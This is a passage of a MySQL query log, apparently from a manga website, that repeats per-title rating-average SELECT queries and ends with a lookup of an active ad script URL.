mangauser@localhost on u317079482_mangacherri_2 using Socket 330657027 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '356' order by created desc 330657027 Quit 330657028 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657028 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330657028 Quit 330657029 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657029 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330657029 Quit 330657030 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657030 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330657030 Quit 330657031 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657031 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330657031 Quit 330657032 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657032 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '318' order by created desc 330657032 Quit 330657033 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657033 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '317' order by created desc 330657033 Quit 330657034 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657034 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '382' order by created desc 330657034 Quit 330657035 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657035 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '295' order by created desc 330657035 Quit 330657036 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657036 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '373' order by created desc 330657036 Quit 330657037 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657037 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330657037 Quit 330657038 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657038 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '247' order by created desc 330657038 Quit 330657039 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657039 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '337' order by created desc 330657039 Quit 330657040 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657040 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330657040 Quit 330657041 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657041 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '335' order by created desc 330657041 Quit 330657042 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657042 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330657042 Quit 330657043 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657043 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330657043 Quit 330657044 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657044 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330657044 Quit 330657045 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657045 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '380' order by created desc 330657045 Quit 330657046 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657046 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '334' order by created desc 330657046 Quit 330657047 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657047 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '336' order by created desc 330657047 Quit 330657048 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657048 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330657048 Quit 330657049 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657049 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330657049 Quit 330657050 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657050 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '340' order by created desc 330657050 Quit 330657051 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657051 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '341' order by created desc 330657051 Quit 330657052 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657052 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '374' order by created desc 330657052 Quit 330657053 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657053 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '367' order by created desc 330657053 Quit 330657054 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657054 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '344' order by created desc 330657054 Quit 330657055 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657055 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '352' order by created desc 330657055 Quit 330657056 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657056 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '357' order by created desc 330657056 Quit 330657057 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657057 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '354' order by created desc 330657057 Quit 330657058 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657058 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '386' order by created desc 330657058 Quit 330657059 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657059 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '333' order by created desc 330657059 Quit 330657060 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657060 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '353' order by created desc 330657060 Quit 330657061 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657061 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '350' order by created desc 330657061 Quit 330657062 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657062 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '376' order by created desc 330657062 Quit 330657063 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657063 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '381' order by created desc 330657063 Quit 330657064 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657064 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '346' order by created desc 330657064 Quit 330657065 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657065 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '309' order by created desc 330657065 Quit 330657066 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657066 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '316' order by created desc 330657066 Quit 330657067 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657067 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '384' order by created desc 330657067 Quit 330657068 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657068 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330657068 Quit 330657069 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657069 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '359' order by created desc 330657069 Quit 330657070 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657070 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '377' order by created desc 330657070 Quit 330657071 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657071 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '378' order by created desc 330657071 Quit 330657072 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657072 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '282' order by created desc 330657072 Quit 330657073 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657073 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '345' order by created desc 330657073 Quit 330657074 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657074 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330657074 Quit 330657075 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657075 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '360' order by created desc 330657075 Quit 330657076 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657076 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '383' order by created desc 330657076 Quit 330657077 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657077 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '375' order by created desc 330657077 Quit 330657078 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657078 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '305' order by created desc 330657078 Quit 330657079 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657079 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330657079 Quit 330657080 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657080 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '369' order by created desc 330657080 Quit 330657081 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657081 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '387' order by created desc 330657081 Quit 330657082 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657082 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '362' order by created desc 330657082 Quit 330657083 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657083 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '388' order by created desc 330657083 Quit 330657084 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657084 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '364' order by created desc 330657084 Quit 330657085 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657085 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '389' order by created desc 330657085 Quit 330657086 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657086 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '365' order by created desc 330657086 Quit 330657087 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657087 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '379' order by created desc 330657087 Quit 330657088 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657088 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '370' order by created desc 330657088 Quit 330657089 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657089 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '390' order by created desc 330657089 Quit 330657090 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657090 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330657090 Quit 330657091 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657091 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '358' order by created desc 330657091 Quit 330657092 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657092 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '356' order by created desc 330657092 Quit 330657093 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657093 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '352' order by created desc 330657093 Quit 330657094 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657094 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '344' order by created desc 330657094 Quit 330657095 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657095 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '343' order by created desc 330657095 Quit 330657096 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657096 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '342' order by created desc 330657096 Quit 330657097 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657097 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '339' order by created desc 330657097 Quit 330657098 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657098 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '329' order by created desc 330657098 Quit 330657099 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657099 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '324' order by created desc 330657099 Quit 330657100 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657100 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '320' order by created desc 330657100 Quit 330657101 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657101 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '318' order by created desc 330657101 Quit 330657102 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657102 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '315' order by created desc 330657102 Quit 330657103 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657103 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '313' order by created desc 330657103 Quit 330657104 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657104 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '308' order by created desc 330657104 Quit 330657105 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657105 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330657105 Quit 330657106 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657106 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330657106 Quit 330657107 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657107 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330657107 Quit 330657108 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657108 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330657108 Quit 330657109 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657109 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330657109 Quit 330657110 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657110 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330657110 Quit 330657111 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657111 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330657111 Quit 330657112 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657112 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330657112 Quit 330657113 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657113 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330657113 Quit 330657114 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657114 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330657114 Quit 330657115 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657115 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330657115 Quit 330657116 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657116 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330657116 Quit 330657117 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657117 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330657117 Quit 330657118 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657118 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330657118 Quit 330657119 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657119 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330657119 Quit 330657120 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657120 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330657120 Quit 330657121 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657121 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330657121 Quit 330657122 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657122 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330657122 Quit 330657123 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657123 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330657123 Quit 330657124 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657124 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330657124 Quit 330657125 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657125 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330657125 Quit 330657126 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657126 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330657126 Quit 330657127 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657127 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330657127 Quit 330657128 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657128 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330657128 Quit 330657129 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657129 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330657129 Quit 330657130 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657130 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330657130 Quit 330657131 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657131 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330657131 Quit 330657132 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657132 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330657132 Quit 330657133 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657133 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330657133 Quit 330657134 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657134 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330657134 Quit 330657135 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657135 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330657135 Quit 330657136 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657136 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330657136 Quit 330657137 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657137 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330657137 Quit 330657138 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657138 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330657138 Quit 330657139 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657139 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330657139 Quit 330657140 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657140 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330657140 Quit 330657141 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657141 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330657141 Quit 330657142 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657142 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330657142 Quit 330657143 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657143 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330657143 Quit 330657144 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657144 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330657144 Quit 330657145 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657145 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330657145 Quit 330657146 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657146 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330657146 Quit 330657147 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657147 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330657147 Quit 330657148 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657148 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '91' order by created desc 330657148 Quit 330657149 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657149 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '89' order by created desc 330657149 Quit 330657150 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657150 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330657150 Quit 330657151 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657151 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330657151 Quit 330657152 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657152 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '84' order by created desc 330657152 Quit 330657153 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657153 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '78' order by created desc 330657153 Quit 330657154 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657154 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '76' order by created desc 330657154 Quit 330657155 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657155 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '75' order by created desc 330657155 Quit 330657156 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657156 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '73' order by created desc 330657156 Quit 330657157 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657157 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '71' order by created desc 330657157 Quit 330657158 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657158 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330657158 Quit 330657159 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657159 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '64' order by created desc 330657159 Quit 330657160 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657160 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330657160 Quit 330657161 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657161 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '58' order by created desc 330657161 Quit 330657162 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657162 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '54' order by created desc 330657162 Quit 330657163 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657163 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '52' order by created desc 330657163 Quit 330657164 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657164 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '47' order by created desc 330657164 Quit 330657165 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657165 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '46' order by created desc 330657165 Quit 330657166 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657166 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '41' order by created desc 330657166 Quit 330657167 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657167 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330657167 Quit 330657168 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657168 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '34' order by created desc 330657168 Quit 330657169 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657169 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '30' order by created desc 330657169 Quit 330657170 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657170 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330657170 Quit 330657171 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657171 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '14' order by created desc 330657171 Quit 330657172 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657172 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '7' order by created desc 330657172 Quit 330657173 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657173 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '6' order by created desc 330657173 Quit 330657174 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657174 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '5' order by created desc 330657174 Quit 330657175 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657175 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '3' order by created desc 330657175 Quit 330657176 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657176 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '2' order by created desc 330657176 Quit 330657177 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657177 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '1' order by created desc 330657177 Quit 330657178 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657179 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657178 Quit 330657179 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330657179 Quit 330657180 Connect mangauser@localhost on 